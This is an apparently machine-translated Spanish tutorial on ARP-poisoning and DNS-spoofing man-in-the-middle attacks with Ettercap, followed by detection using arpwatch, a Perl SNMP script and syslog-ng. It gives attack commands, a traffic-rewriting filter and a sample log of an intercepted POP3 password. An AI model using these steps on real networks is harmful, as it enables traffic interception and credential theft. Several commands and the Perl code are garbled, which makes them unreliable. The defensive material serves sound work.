Ettercap: un analizador de tráfico universal. Escaneando redes wifi en Ubuntu con Ettercap Ettercap el objetivo atacado pierde internet

Ettercap es una utilidad para analizar el tráfico de red que pasa a través de una interfaz de computadora, pero con funcionalidad adicional. El programa le permite realizar ataques de intermediario para obligar a otra computadora a transmitirle paquetes a usted en lugar de al enrutador.

Con Ettercap podrás comprobar la seguridad de tu red, qué tan susceptible es a este tipo de ataques, así como analizar el tráfico de múltiples ordenadores, e incluso modificarlo sobre la marcha. En este artículo veremos cómo utilizar Ettercap para analizar y modificar el tráfico.

¿Qué es un ataque de Hombre en el Medio?

De forma predeterminada, la computadora envía todos los paquetes de red que deben enviarse a Internet al enrutador, quien, a su vez, los envía al siguiente enrutador hasta que el paquete llega a su destino. Pero por ciertas razones, es posible que el paquete no se transmita al enrutador, sino directamente a su computadora, y solo luego al enrutador.

El ordenador por el que pasarán los paquetes puede analizar la dirección de origen, la de destino y, si no están cifrados, su contenido completo.

Hay dos formas de realizar MITM (Man In Middle Attack):

ataque ARP- utilizando las funciones del protocolo ARP, su computadora les dice a los demás que es un enrutador, después de lo cual comienzan a enviarle todos los paquetes;
Ataque DNS- cuando una computadora intenta obtener una dirección IP para un dominio, reemplazamos esta dirección por la nuestra, pero para que este tipo funcione, es necesario utilizar el método ARP.

El programa Ettercap Linux puede realizar ambos tipos de ataques. Además, la utilidad puede realizar ataques de denegación de servicio y escanear puertos. Ahora veamos cómo instalar y usar Ettercap.

Instalación de Ettercap

Este es un programa bastante popular entre los especialistas en seguridad de redes, por lo que está disponible en los repositorios oficiales de la mayoría de las distribuciones. Por ejemplo, para instalar Ettercap en Ubuntu ejecute:

$ sudo apto instalar ettercap-gtk

En Fedora u otras distribuciones basadas en él, el comando tendrá un aspecto similar:

$ sudo yum instalar ettercap-gtk

Hemos completado la tarea de instalar Ettercap Linux, pero antes de usarlo, debemos cambiar varias configuraciones en el archivo de configuración.

$ sudo vi /etc/ettercap/etter.conf

Las líneas ec_uid y ec_gid deben tener el valor 0 para que el servicio del programa se ejecute como superusuario:

ec_uid = 0 # nadie es el predeterminado
ec_gid = 0 # nadie es el predeterminado

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Se utilizan para redirigir conexiones SSL a HTTP normal, si es posible. Luego guarde los cambios y el programa estará listo para usar.

Usando la GUI de Ettercap

El programa puede funcionar en varios modos: con una interfaz gráfica, sin y como servicio. Consideraremos trabajar en una interfaz gráfica. Para ejecutar un programa con la interfaz GTK, use la opción -G:

$ sudo -E ettercap -G

Ataque de envenenamiento por ARP en Ettercap

Como ya dije, con este ataque podemos obligar al ordenador objetivo a enviar paquetes no al router, sino a nosotros. Todo funciona de forma bastante sencilla. La computadora conoce la IP del enrutador; la recibió al conectarse a la red. Pero cada vez que necesita enviar un paquete, necesita convertir esta dirección IP universal en una dirección de bajo nivel de la tecnología de red utilizada; por ejemplo, para Internet por cable es una dirección MAC.

Para ello se utiliza el protocolo ARP. La computadora envía una solicitud a todos los dispositivos de la red, por ejemplo, "quién es 192.168.1.1" y el enrutador, al ver su dirección, enviará su MAC en respuesta. Luego se guardará en el caché. Pero podemos usar Ettercap para pedirle a la computadora de destino que actualice su caché ARP y le proporcione nuestra dirección MAC en lugar de la dirección MAC del enrutador. Luego, todos los paquetes nos serán transferidos y los enviaremos a donde sea necesario.

Pongámonos manos a la obra y realicemos el ataque de suplantación de identidad attercap arp. En Ettercap, abre el menú. Oler y seleccione Olfateo unificado. Luego seleccione su interfaz de red, por ejemplo eth0 o wlan0:

La ventana del programa cambiará y muchas más funciones estarán disponibles para nosotros. Ahora necesitas escanear la red. Para hacer esto, abra el menú. Hospedadores y presione Escanear hosts. Incluso si algo no funciona, puedes cargar una lista de hosts desde un archivo:

Para iniciar un ataque, debemos especificar el objetivo 1 y el objetivo 2. Como primer objetivo, debemos especificar la ip de la máquina que vamos a atacar y, como objetivo 2, la ip del enrutador. Utilice los botones para agregar objetivos. Agregar objetivo 1 Y Añadir objetivo 2:

En la ventana que se abre, marque la casilla Olfatear conexiones remotas para interceptar todas las conexiones remotas desde esta computadora:

Ahora, para iniciar el proceso de sustitución en el menú. Comenzar seleccionar Empiece a olfatear.

Después de esto, el programa comenzará a enviar paquetes a la red con una solicitud a 192.168.1.3 para actualizar el caché ARP y reemplazar la dirección MAC del enrutador por la suya. El ataque ha sido lanzado y ejecutado con éxito. Puedes abrir el menú. Vista -> Conexiones y ver las conexiones activas para el dispositivo de destino:

Si el paquete no estaba cifrado, podemos ver la información transmitida haciendo clic en la conexión con el mouse. La información enviada se muestra a la izquierda y la información recibida a la derecha:

Ataque de suplantación de DNS utilizando Ettercap

Para convertir nombres de sitios en direcciones IP de red, se utiliza un servicio especial: DNS. Cuando una computadora necesita la IP de un sitio, la solicita al servidor DNS. Pero si ya está realizando un ataque MITM, entonces podemos reemplazar la respuesta del servidor para que, en lugar de la IP del servidor del sitio, se devuelva nuestra IP. Primero necesitamos editar el archivo /etc/ettercap/etter.dns:

$ sudo vi /etc/ettercap/etter.dns

google.com.ua A 127.0.0.1

Esta entrada significa que reemplazaremos la IP principal de google.com.ua con 127.0.0.1. Tenga en cuenta que este ataque no se ejecuta sin el anterior. A continuación abre el menú. Complementos -> Administrar complementos:

Luego haga doble clic en el complemento. dns_spoof:

El complemento se activará y podrá verificar la IP en el dispositivo. De hecho, el DNS ha cambiado. Por ejemplo, puede ejecutar en la máquina de destino:

$ ping google.com.ua

$pingwww.ettercap.org

Además de estos complementos, existen otros con los que podrás realizar las acciones necesarias.

Filtros Ettercap

Los filtros le permiten modificar sobre la marcha los paquetes que pasan por el programa. Puede descartar paquetes o realizarles los cambios necesarios utilizando la función de reemplazo. Los filtros también solo funcionan mientras se ejecuta un ataque MITM. La sintaxis de las condiciones por las que filtraremos paquetes es muy similar a Wirehark. Veamos un filtro simple que reemplazará todas las imágenes con las nuestras:

$ vi prueba.filtro

si (ip.proto == TCP && tcp.dst == 80) (
if (buscar(DATOS.datos, "Codificación de aceptación")) (
reemplazar("Aceptar-Codificación", "Aceptar-Basura!");
# nota: la cadena de reemplazo tiene la misma longitud que la cadena original
msg("¡Aceptar-codificación eliminada!\n");
}
}
si (ip.proto == TCP && tcp.src == 80) (
reemplazar("img src="/, "img src=\"https://pbs.twimg.com/profile_images/655061121007616000/NCV0qQnS.png\" ");
reemplazar("IMG SRC=", "img src=\"https://pbs.twimg.com/profile_images/655061121007616000/NCV0qQnS.png\" ");
msg("Filtro Ran.\n");
}

Para aquellos que tengan experiencia trabajando con lenguajes de programación, aquí todo debería quedar claro. Si el protocolo es TCP y el puerto de destino es el 80 seguimos buscando y buscamos Accept-Encoding. Luego reemplazamos esta palabra por cualquier otra, pero de longitud equivalente. Porque si el navegador envía gzip Accept-Encoding, los datos se comprimirán y no filtraremos nada allí. A continuación, en la respuesta del servidor, puerto de origen 80, reemplazamos todas las imágenes por las nuestras. Ahora es necesario compilar el filtro:

$ etterfilter prueba.filtro -o prueba.ef

Ya solo queda cargar el filtro usando el menú Filtros -> Cargar filtro:

Seleccione el archivo de filtro en el sistema de archivos:

El filtro se cargará y podrás abrir cualquier sitio que no utilice https para asegurarte de que todo funcione. Para detener un ataque MITM, abra el menú MITM y seleccione Detener todos los ataques Mitm. Nuestro tutorial de Ettercap está llegando a su fin, pero...

¿Cómo protegerse?

Probablemente, después de leer el artículo, tengas una pregunta razonable: ¿cómo proteger tu computadora de este tipo de ataques? Existen varias herramientas para ello, incluso para el sistema operativo Linux:

XArp- una utilidad gráfica que puede detectar intentos de falsificar direcciones MAC mediante el protocolo ARP y contrarrestarlos. Puede funcionar en Windows y Linux;
Bufido- un sistema antiintrusión bastante conocido que, entre otras cosas, detecta ataques al protocolo ARP;
Arpon- un pequeño servicio que monitorea la tabla ARP y la protege contra la suplantación de direcciones MAC.

Utilice el programa sólo para comprobar la seguridad de sus redes o aplicaciones, y no olvide que las acciones ilegales en el espacio de la información también son punibles.

Para completar el vídeo que demuestra cómo funciona el programa:

necesitas registrarte,
para dejar un comentario

El ordenador por el que pasarán los paquetes puede analizar la dirección de origen, la de destino y, si no están cifrados, su contenido completo.

Hay dos formas de realizar MITM (Man In Middle Attack):

ataque ARP- utilizando las funciones del protocolo ARP, su computadora les dice a los demás que es un enrutador, después de lo cual comienzan a enviarle todos los paquetes;
Ataque DNS- cuando una computadora intenta obtener una dirección IP para un dominio, reemplazamos esta dirección por la nuestra, pero para que este tipo funcione, es necesario utilizar el método ARP.

Instalación de Ettercap

sudo apto instalar ettercap-gtk

En Fedora u otras distribuciones basadas en él, el comando tendrá un aspecto similar:

sudo yum instalar ettercap-gtk

Hemos completado la tarea de instalar Ettercap Linux, pero antes de usarlo, debemos cambiar varias configuraciones en el archivo de configuración.

sudo vi /etc/ettercap/etter.conf

Las líneas ec_uid y ec_gid deben tener el valor 0 para que el servicio del programa se ejecute como superusuario:

ec_uid = 0 # nadie es el predeterminado
ec_gid = 0 # nadie es el predeterminado

Se utilizan para redirigir conexiones SSL a HTTP normal, si es posible. Luego guarde los cambios y el programa estará listo para usar.

Usando la GUI de Ettercap

sudo -E ettercap -G

Ataque de envenenamiento por ARP en Ettercap

En la ventana que se abre, marque la casilla Olfatear conexiones remotas para interceptar todas las conexiones remotas desde esta computadora:

Ahora, para iniciar el proceso de sustitución en el menú. Comenzar seleccionar Empiece a olfatear.

Ataque de suplantación de DNS utilizando Ettercap

sudo vi /etc/ettercap/etter.dns

google.com.ua A 127.0.0.1

Luego haga doble clic en el complemento. dns_spoof:

El complemento se activará y podrá verificar la IP en el dispositivo. De hecho, el DNS ha cambiado. Por ejemplo, puede ejecutar en la máquina de destino:

ping google.com.ua

ping www.ettercap.org

Además de estos complementos, existen otros con los que podrás realizar las acciones necesarias.

Filtros Ettercap

si (ip.proto == TCP && tcp.dst == 80) (
if (buscar(DATOS.datos, "Codificación de aceptación")) (
reemplazar("Aceptar-Codificación", "Aceptar-Basura!");
# nota: la cadena de reemplazo tiene la misma longitud que la cadena original
msg("¡Aceptar-codificación eliminada!\n");
}
}
si (ip.proto == TCP && tcp.src == 80) (
reemplazar("img src=", "img src=\"https://pbs.twimg.com/profile_images/655061121007616000/NCV0qQnS.png\" ");
reemplazar("IMG SRC=", "img src=\"https://pbs.twimg.com/profile_images/655061121007616000/NCV0qQnS.png\" ");
msg("Filtro Ran.\n");
}

etterfilter prueba.filtro -o prueba.ef

Ya solo queda cargar el filtro usando el menú Filtros -> Cargar filtro:

Seleccione el archivo de filtro en el sistema de archivos:

¿Cómo protegerse?

XArp- una utilidad gráfica que puede detectar intentos de falsificar direcciones MAC mediante el protocolo ARP y contrarrestarlos. Puede funcionar en Windows y Linux;
Bufido- un sistema antiintrusión bastante conocido que, entre otras cosas, detecta ataques al protocolo ARP;
Arpon- un pequeño servicio que monitorea la tabla ARP y la protege contra la suplantación de direcciones MAC.

conclusiones

En este artículo, vimos cómo utilizar Ettercap, un programa para analizar paquetes de red y realizar ataques Man-in-the-Middle. Utilice el programa sólo para comprobar la seguridad de sus redes o aplicaciones, y no olvide que las acciones ilegales en el espacio de la información también son punibles.

Para completar el vídeo que demuestra cómo funciona el programa:

Suplantación de ARP(ARP-poisoning) es una técnica de ataque de red utilizada principalmente en Ethernet, pero también posible en otras redes que utilizan el protocolo ARP, basándose en el uso de las deficiencias del protocolo ARP y que permite interceptar el tráfico entre nodos que se encuentran dentro de la misma transmisión. dominio.

El artículo describe en detalle la técnica de ataque. Suplantación de ARP, tomando como ejemplo un ataque realizado mediante el programa ettercap; Se consideran métodos para detectar y prevenir ataques ARP, como monitorear la actividad de ARP usando arpwatch, aplicar parches especiales para hacer que los sistemas sean inmunes, usar VLAN y PPPoE. Se muestra cómo resolver problemas directamente relacionados con el protocolo ARP: buscar computadoras usando una dirección MAC conocida y descubrir nuevas computadoras en la red.

Protocolo ARP y ataques que lo utilizan.

¿Qué es ARP y por qué es necesario?

El protocolo ARP está diseñado para convertir direcciones IP en direcciones MAC. La mayoría de las veces hablamos de conversión a direcciones Ethernet, pero ARP también se utiliza en redes de otras tecnologías: Token Ring, FDDI y otras.

algoritmo ARP

El protocolo se puede utilizar en los siguientes casos:

Anfitrión A quiere enviar un paquete IP nodo B, ubicado en la misma red que él;
Anfitrión A quiere enviar un paquete IP nodo B, ubicado con él en diferentes redes, y utiliza los servicios para esto enrutador R.

En cualquiera de estos casos nodo A Se utilizará el protocolo ARP, sólo en el primer caso para determinar la dirección MAC nodo B, y en el segundo, para determinar la dirección MAC enrutador R. En el último caso, el paquete se transferirá al enrutador para su posterior retransmisión.

A continuación, por simplicidad, consideramos el primer caso, cuando la información se intercambia entre nodos ubicados directamente en la misma red. (El caso en el que el paquete se dirige a un host ubicado detrás del enrutador se diferencia solo en que en los paquetes transmitidos después de que se completa la traducción ARP, se utiliza la dirección IP del destinatario, pero la dirección MAC del enrutador, no la del destinatario).

problemas de arp

El protocolo ARP es completamente inseguro. No tiene ningún medio para verificar la autenticidad de los paquetes, ya sean solicitudes o respuestas. La situación se vuelve aún más compleja cuando se puede utilizar ARP gratuito.

ARP espontáneo- este es el comportamiento de ARP cuando se envía una respuesta ARP cuando no hay una necesidad particular (desde el punto de vista del destinatario). Una respuesta ARP espontánea es un paquete de respuesta ARP enviado sin una solicitud. Se utiliza para detectar conflictos de direcciones IP en una red: tan pronto como una estación recibe una dirección a través de DHCP o se asigna una dirección manualmente, se envía una respuesta ARP gratuita.

La ARP espontánea puede resultar útil en los siguientes casos:

Actualización de tablas ARP, en particular en sistemas de clúster;
Interruptores informativos;
Notificación de que la interfaz de red está habilitada.

A pesar de la efectividad del ARP espontáneo, es especialmente inseguro porque puede usarse para convencer a un host remoto de que la dirección MAC de algún sistema en la misma red ha cambiado e indicar qué dirección está ahora en uso.

Suplantación de ARP

Antes de realizar la suplantación de ARP en la tabla ARP de nodos A Y B hay entradas con las direcciones IP y MAC de cada uno. La información se intercambia directamente entre los nodos A y B. (flecha verde)

Durante la suplantación de ARP computadora C, realizando el ataque, envía respuestas ARP (sin recibir solicitudes):

nodo A: con dirección IP del host B y dirección MAC del host C;
nodo B: con dirección IP del host A y dirección MAC del host C.

Debido a que las computadoras admiten ARP gratuito, modifican sus propias tablas ARP y colocan entradas allí en lugar de las direcciones MAC reales de las computadoras. A Y B es la dirección MAC de la computadora C. (flechas rojas)

Una vez completado el ataque cuando la computadora A quiere enviar un paquete a la computadora B, encuentra una entrada en la tabla ARP (corresponde a la computadora C) y determina la dirección MAC del destinatario a partir de ella. Un paquete enviado a esta dirección MAC llega al ordenador C en lugar del destinatario. Computadora C luego transmite el paquete a quien realmente está destinado, es decir, computadora B. (flechas azules)

Herramientas para realizar suplantación de ARP

Actualmente, existen varias herramientas para realizar la suplantación de ARP, que se ejecutan tanto en el sistema operativo Linux como en el Windows.

El más famoso:

Ettercap
Caín y Abel
olfatear
arp-sk

Todos los programas nombrados se distribuyen gratuitamente.

Realizar suplantación de ARP usando ettercap

[Ejemplo de cómo realizar un ataque usando ettercap.] Veamos cómo realizar el ataque anterior usando ettercap.

¿Qué sucede en la máquina A?
¿Qué sucede en la máquina B?
¿Qué sucede en la máquina C?

Echemos un vistazo más de cerca a cómo se realiza la suplantación de ARP. Usaremos el programa ettercap como herramienta, pero otras herramientas para realizar suplantación de ARP funcionan de manera similar.

Máquina A - hostA - 192.168.15.201 - 00:04:75:75:46:B1
Máquina B - hostB - 192.168.15.254 - 00:0A:01:D4:D1:39
Máquina C - hostC - 192.168.15.200 - 00:0A:01:D4:D1:E3

Realiza el ataque anfitriónC contra nodos anfitriónA Y anfitriónB.

Instale ettercap utilizando el método del sistema aceptado:
hostC%# apt-get instalar ettercap
Realizar un ataque contra hostA y hostB:
%# ettercap -T -M arp -L registro /192.168.15.201/ /192.168.15.254/
Opciones significan:

-T - usar interfaz de texto (consola);
-M arp: utiliza el módulo de suplantación de identidad ARP para realizar un ataque;
-L log - escribe el registro de interceptación en archivos llamados log.*;

Las direcciones IP de las máquinas contra las que se debe realizar el ataque de suplantación de ARP se especifican como argumentos.

Supongamos, por ejemplo, que en este momento el nodo A acceda al nodo B utilizando el protocolo POP3, un ejemplo clásico de un protocolo inseguro pero muy común: consultar el correo.

hostA %# nc 192.168.15.254 110
USUARIO usuario
+OK
PASAR contraseña
+OK
LISTA
+OK
.

Los datos transmitidos entre el cliente hostA y el servidor hostB pasan a través del nodo C. Se muestran en la pantalla y se escriben en archivos. Una vez completado el ataque, debes presionar q para salir de ettercap. El programa envía paquetes ARP para restaurar entradas antiguas en la caché ARP de los nodos para que se comuniquen entre sí directamente. Deben aparecer dos archivos en el directorio actual, comenzando con la palabra especificada después del modificador -L al llamar ettercap:

%# ls registro.*
registro.eci
registro.ecp

Puede ver su contenido utilizando el programa etterlog incluido en el paquete ettercap:

%# etterlog log.eci
etterlog NG-0.7.3 derechos de autor 2001-2004 ALoR y NaGA
Versión del archivo de registro: NG-0.7.3
Marca de tiempo: jueves 21 de junio 12:23:11 2007
Tipo: LOG_INFO
Huella digital del sistema operativo 1698 tcp
7587 huella digital del proveedor de mac
2183 servicios conocidos

Dirección IP: 192.168.15.201
Dirección MAC: 00:04:75:75:46:B1
...
FABRICANTE: Sohoware
DISTANCIA: 0
TIPO: servidor LAN
HUELLA DACTILAR:
SISTEMA OPERATIVO: DESCONOCIDO
PUERTO: TCP 110 | pop-3
CUENTA: usuario
/contraseña
(192.168.15.201)
==================================================

Como puede ver, la contraseña fue interceptada con éxito. Veamos cómo cambia la tabla ARP en el hostA (el nodo atacado)

Antes del ataque.

hostA%# arp -an

Durante el ataque.

hostA%# arp -an
? (192.168.15.254) a las 00:0A:01:D4:D1:E3 en eth0
? (192.168.15.200) a las 00:0A:01:D4:D1:E3 en eth0

Después del ataque.

hostA%# arp -an
? (192.168.15.254) a las 00:0A:01:D4:D1:39 en eth0
? (192.168.15.200) a las 00:0A:01:D4:D1:E3 en eth0

Si observa lo que sucede en la interfaz eth0 del hostA (a través de la cual se lleva a cabo el ataque), puede ver que tan pronto como comienza el ataque, llegan paquetes ARP a la interfaz, que indican que la dirección MAC de la máquina 192.168.15.254 ha cambiado. Los paquetes llegan constantemente. Cuando se completa el ataque, la dirección MAC del paquete cambia repentinamente a otra. Y luego dejan de venir por completo.

%# tcpdump -i eth0 arp
08:34:20.231680 respuesta arp 192.168.15.254 is-at 00:0a:01:d4:d1:e3 (oui desconocido)
08:34:21.259637 respuesta arp 192.168.15.254 is-at 00:0a:01:d4:d1:e3 (oui desconocido)
08:34:22.287591 respuesta arp 192.168.15.254 is-at 00:0a:01:d4:d1:e3 (oui desconocido)
08:34:23.315522 respuesta arp 192.168.15.254 is-at 00:0a:01:d4:d1:e3 (oui desconocido)
08:34:32.463255 respuesta arp 192.168.15.254 is-at 00:0a:01:d4:d1:39 (oui desconocido)
08:34:33.491040 respuesta arp 192.168.15.254 is-at 00:0a:01:d4:d1:39 (oui desconocido)
08:34:34.514988 respuesta arp 192.168.15.254 is-at 00:0a:01:d4:d1:39 (oui desconocido)

Esta técnica garantiza que la tabla ARP de las víctimas se restaurará y nadie notará el ataque.

Métodos de detección

arpwatch

El programa arpwatch monitorea toda la actividad ARP en interfaces específicas. Cuando detecta anomalías, como un cambio en la dirección MAC mientras mantiene una dirección IP, o viceversa, lo informa a syslog.

Instalación y configuración de arpwatch.

Veamos el procedimiento de instalación y configuración de arpwatch usando el sistema Debian GNU/Linux como ejemplo. La instalación de arpwatch se realiza de forma tradicional para la distribución:

%# apt-get instalar arpwatch
0 actualizado, 1 recién instalado, 0 para eliminar y 0 no actualizado.
Necesita obtener 124 kB de archivos.
Después de descomprimir, se utilizarán 389 kB de espacio adicional en disco.
Obtener:1 http://debian.ZLO.ZLO.ZLO etch/main arpwatch 2.1a13-2
Obtenido 124 kB en 0 s (177 kB/s)
Seleccionando el paquete arpwatch previamente deseleccionado.
(Leyendo base de datos... 22406 archivos y directorios instalados actualmente).
Descomprimiendo arpwatch (de .../arpwatch_2.1a13-2_i386.deb) ...
Configurando arpwatch (2.1a13-2) ...
Iniciando el demonio de monitoreo de estación Ethernet/FDDI: (chown arpwatch /var/lib/arpwatch/arp.dat) arpwatch.

Una vez instalado el demonio, comenzará a ejecutarse automáticamente. (En otros sistemas, es posible que sea necesario iniciarlo manualmente).

%# ps auxiliar | grep arpwatch
arpwatch 4810 0,5 0,4 3448 2360? S 08:36 0:00 /usr/sbin/arpwatch -u arpwatch -N -p
raíz 4827 0.0 0.1 2852 712 pts/6 R+ 08:36 0:00 grep arpwatch

El demonio no tiene ningún archivo de configuración. La configuración de arpwatch está completamente determinada por el conjunto de claves que se le pasan. En Debian GNU/Linux, las claves se especifican en el archivo de configuración /etc/default/arpwatch (en FreeBSD, en el archivo /etc/rc.conf). Si necesita cambiar la configuración de arpwatch (en particular, hacer que escuche otras interfaces), debe editar el archivo especificado:

%# vi /etc/default/arpwatch
%# gato /etc/default/arpwatch
# Opciones globales para arpwatch(8).
# Debian: no informe bogons, no use PROMISC.
ARGS="-N -p"
# Debian: ejecutar como usuario `arpwatch". Vacíe esto para ejecutar como root.
RUNAS="arpwatch"

Si se ha cambiado la configuración, se debe reiniciar el demonio:

%# /etc/init.d/arpwatch reiniciar

Cuando el demonio se inicia, descubre nuevas estaciones. No se realiza ninguna acción activa, solo se escucha el tráfico ARP. Se recuerdan los nodos detectados; arpwatch informa que se ha descubierto un nuevo nodo en syslog. El demonio también informa todas las anomalías que detecta en el funcionamiento del protocolo ARP en syslog:

# cola -f /var/log/daemon.log
21 de junio 08:37:08 s_all@linux2 arpwatch: nueva estación 192.168.15.200 0:a:1:d4:d1:e3 eth0
21 de junio 08:37:08 s_all@linux2 arpwatch: nueva estación 192.168.15.201 0:4:75:75:46:b1 eth0
21 de junio 08:37:09 s_all@linux2 arpwatch: nueva estación 192.168.15.254 0:a:1:d4:d1:39 eth0
21 de junio 08:37:09 s_all@linux2 arpwatch: dirección ethernet cambiada 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0
21 de junio 08:37:11 s_all@linux2 arpwatch: Ethernet no coincide 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0
21 de junio 08:37:12 s_all@linux2 arpwatch: Ethernet no coincide 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0
21 de junio 08:37:13 s_all@linux2 arpwatch: Ethernet no coincide 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0

Presta atención a la línea

21 de junio 08:37:09 s_all@linux2 arpwatch: dirección ethernet cambiada 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0

que informa que el host 192.168.15.254 ha cambiado su dirección MAC.

Esto puede significar que el host que ejecuta arpwatch está siendo falsificado mediante ARP para interceptar el tráfico que intercambia con el host 192.168.15.254.

Detectar un host que realiza suplantación de ARP

Si el conmutador está administrado, puede determinar cuál de sus puertos ejecuta un nodo que tiene una dirección MAC específica.

Por ejemplo, esto se puede hacer usando el script mac2port. El script se pone en contacto con el conmutador a través de SNMP y consulta su tabla de asignaciones de direcciones MAC a puertos. La información recibida se envía en un formato fácil de buscar al flujo de salida estándar. Para facilitar su uso, el script muestra las direcciones MAC en el mismo formato que arpwatch.

Condiciones para utilizar el script:

el script debe colocarse en el directorio /usr/local/bin u otro directorio especificado en PATH;
el script debe ser ejecutable (chown +x mac2port) o invocarse con el intérprete de perl;
el cuerpo del script debe indicar la dirección IP del conmutador y su comunidad SNMP RO;
el conmutador debe admitir SNMP versión 2; el soporte debe estar habilitado (no es difícil reescribir el script al protocolo SNMPv3 más seguro, pero esta versión funciona específicamente con SNMPv2).

Ejemplo de uso del script:
%# ./mac2port
0:4:76:a1:ef:bb -> 1
0:a:1:d4:d1:e3 -> 2
0:15:60:79:8e:c0 -> 0
0:4:75:75:46:b1 -> 3
0:a:1:d4:d1:39 -> 44

Si se detectó previamente un ataque usando arpwatch:

%# gato /var/log/daemon.log | grep "dirección ethernet cambiada"
21 de junio 08:37:09 s_all@linux2/192.168.15.201 arpwatch: dirección ethernet cambiada 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0

puede usar el script y determinar desde qué puerto del switch se creó (no importa si esta es la verdadera dirección MAC de la tarjeta de red del atacante o si ha sido modificada):

%# mac=$(cat /var/log/daemon.log | grep "dirección ethernet cambiada" | awk "(imprimir $10)")
%# ./mac2port | grep$mac
0:a:1:d4:d1:e3 -> 2

Es importante que la determinación se tome rápidamente, mientras la información sobre el atacante aún esté almacenada en la memoria del conmutador.

Para ello, tiene sentido llamar automáticamente al script de búsqueda cuando se detecta la entrada correspondiente en el registro del sistema. El análisis de registros se puede realizar, por ejemplo, utilizando herramientas como muestra de tela o syslog-ng.

Por ejemplo, si usas syslog-ng. Puede crear un script que realice el análisis:
/usr/local/bin/syslog-ng-arpwatch

#!/bin/sh
RUTA=$RUTA:/usr/local/bin
mientras lee la línea
hacer
mac="$(echo $line | grep "dirección ethernet cambiada" | awk "(print $10)")"
[ -z "$mac"] && continuar
(echo POSIBLEMENTE ARP-SPOOFING DESDE:; mac2port | grep "$mac")| registrador -t arp-suplantación de identidad
hecho

y conéctelo a syslog-ng.
Para hacer esto, debe especificar las siguientes líneas en el archivo de configuración syslog-ng.conf:

destino dp_arpspoofing (
programa("/usr/local/bin/syslog-ng-arpwatch");
};
filtro f_arpspoofing (
partido("arpwatch");
};
registro(
fuente(s_all);
filtro(f_arpspoofing);
destino(dp_arpspoofing);
};

Cadena
filtro(f_arpspoofing);

Puede que no sea necesario especificarlo, pero en sistemas cargados reduce significativamente la carga. En este caso, al realizar arp-spoofing sucede lo siguiente:

Demonio arpwatch envía información a syslog (a través del socket estándar /dev/log o /var/run/log);
Si se utiliza Syslog-NG como servidor syslog, detecta la firma del mensaje y pasa la línea detectada al script. syslog-ng-arpwatch;
Guion syslog-ng-arpwatch, si ve que el problema está realmente relacionado con la suplantación de ARP, llama a un script de búsqueda de puerto por dirección MAC;
Guion mac2port accede al conmutador a través de SNMP;
El conmutador responde: transmite tablas que contienen información sobre la correspondencia de las direcciones MAC con los puertos al script que lo llamó;
Guion mac2port devuelve una tabla de direcciones MAC correspondientes a los puertos del switch al script syslog-ng-arpwatch;
Guion syslog-ng-arpwatch encuentra el puerto de interés y escribe un mensaje en syslog;
Demonio syslog-ng escribe un mensaje con información sobre el puerto del conmutador en un archivo y también puede enviarlo por SMS o correo al administrador o llamar a un programa externo (que, por ejemplo, después de comprobaciones adicionales, puede bloquear el puerto del conmutador);
El administrador lee sobre el ataque detectado en el archivo.

Así es como se ve en el archivo:
21 de junio 13:55:23 s_all@linux3 arp-spoofing: POSIBLEMENTE ARP-SPOOFING DESDE:
21 de junio 13:55:23 s_all@linux3 arp-spoofing: 0:a:1:d4:d1:e3 -> 2

texto del script mac2port

#!/usr/bin/perl
nuestra $comunidad = "público";
nuestro $switch = "192.168.15.100";
open(SNMP,"snmpwalk -On -OQ -v2c -c $comunidad $switch .1.3.6.1.2.1.17.4.3.1.1|")
o morir "No se puede ejecutar snmpwalk";
mientras()
{
morder;
[correo electrónico protegido]@@;
mi ($oid, $mac) = dividir /=\s*/;
$_=$mac;
s@"@@g; s@\s*$@@; s@ @:@g; s@(.)@\l\1@g; s@^0@@; s@:0@:@ gramo;
$mac_table($_)=$oid;
}
cerrar(SNMP);
open(SNMP,"snmpwalk -On -OQ -v2c -c $comunidad $switch .1.3.6.1.2.1.17.4.3.1.2|")
o morir "No se puede ejecutar snmpwalk";
mientras()
{
morder;
[correo electrónico protegido]@@;
mi ($oid, $puerto) = dividir /=/;
$ports_table($oid)=$puerto;
}
cerrar(SNMP);
para $oid (claves %mac_table) (
print "$oid -> ".$ports_table($mac_table($oid))."\n";
}

Métodos de prevención

Luchando contra la suplantación de ARP con arpwatch y herramientas similares, aunque muy simples, están lejos de ser efectivas.

Primero, para detectar un ataque, el programa arpwatch (o similar) debe estar ejecutándose en los nodos protegidos. Si se ejecuta sólo en uno de los dos nodos que están siendo falsificados con ARP, existe la posibilidad de que se produzca un ataque unilateral no detectado.
En segundo lugar, y más importante, arpwatch Sólo permite detectar un ataque, pero no es capaz de prevenirlo.

Para evitar las consecuencias de un ataque, se requiere la intervención de un administrador o de un sistema externo. En el primer caso, puede pasar demasiado tiempo entre la detección y la respuesta del administrador. En el segundo, no se requiere ninguna intervención, la reacción se realiza automáticamente: tan pronto como se detecta una anomalía ARP, se determina el puerto del switch al que está conectada la fuente de la anomalía y el puerto se bloquea hasta su aclaración. Sin embargo, este enfoque tiene un gran inconveniente: se puede utilizar para realizar un ataque DOS: solo necesita averiguar la dirección MAC de la computadora que necesita desconectarse de la red y simular un ataque desde esta computadora. Entonces nuestro sistema para detectar y prevenir la suplantación de ARP hará todo por sí solo.

Los métodos considerados para contrarrestar los ataques ARP se basan en dos principios completamente diferentes, cada uno de los cuales tiene ventajas y desventajas.

Ambos métodos, además de proteger de manera confiable contra la suplantación de ARP, también tienen la ventaja de que le permiten controlar completamente el tráfico, no solo el que pasa a través de la puerta de enlace, sino también el que circula entre las máquinas (en el caso de Al usar PPPoE, las máquinas pueden, de mutuo acuerdo, intercambiar datos directamente entre sí. En el caso de usar VLAN, quedan completamente privadas de esta oportunidad).

Ataque unilateral
